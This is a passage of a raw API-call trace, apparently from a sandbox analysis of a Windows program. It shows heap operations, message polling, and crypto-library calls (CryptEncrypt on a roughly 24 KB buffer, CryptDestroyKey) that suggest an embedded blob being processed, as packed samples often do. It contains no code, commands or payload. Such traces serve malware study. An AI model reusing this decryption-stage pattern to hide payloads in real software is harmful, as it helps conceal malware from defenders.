[0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0029.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0029.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0029.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0029.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0029.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0029.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0029.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0029.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0029.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0029.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0029.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0029.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0029.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0029.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0029.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0029.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0029.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0029.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0029.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0029.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0029.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0029.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0029.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0029.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0029.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0029.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0029.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0029.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0029.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0029.634] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0029.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0029.635] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da2c8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2c8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0029.635] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.635] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.635] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.635] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.635] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.635] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.635] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.635] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.635] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0029.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0029.635] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.635] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0029.635] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0029.635] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.635] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.635] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0029.635] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.635] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0029.636] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.636] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.636] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.636] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0029.636] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.636] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0029.636] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.636] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.636] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x5df2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x5e00) returned 1 [0029.636] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.636] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0029.636] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.637] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.637] CharLowerBuffW (in: lpsz="byte[24065]", cchLength=0xb | out: lpsz="byte[24065]") returned 0xb [0029.637] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.637] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.637] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.637] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.637] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.637] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8c19c0*, pdwDataLen=0x6ae220*=0x5df2, dwBufLen=0x5e00 | out: pbData=0x8c19c0*, pdwDataLen=0x6ae220*=0x5e00) returned 1 [0029.638] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.638] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0029.638] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.638] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.638] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.638] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.638] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0029.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.638] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.638] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.638] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.638] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0029.638] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.638] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.638] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0029.638] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.638] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0029.638] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.639] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.639] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.639] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.640] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.640] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.640] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0029.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.640] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.640] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.640] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0029.640] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.641] CryptDestroyKey (hKey=0x7c2280) returned 1 [0029.641] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.641] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.641] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0029.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.641] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.641] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.641] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0029.641] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0029.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0029.641] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.641] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.641] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0029.641] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0029.641] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.641] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.641] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.642] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.642] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0029.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.642] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.642] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.642] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.642] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.642] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.642] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.642] HeapFree (in: hHeap=0x770000, 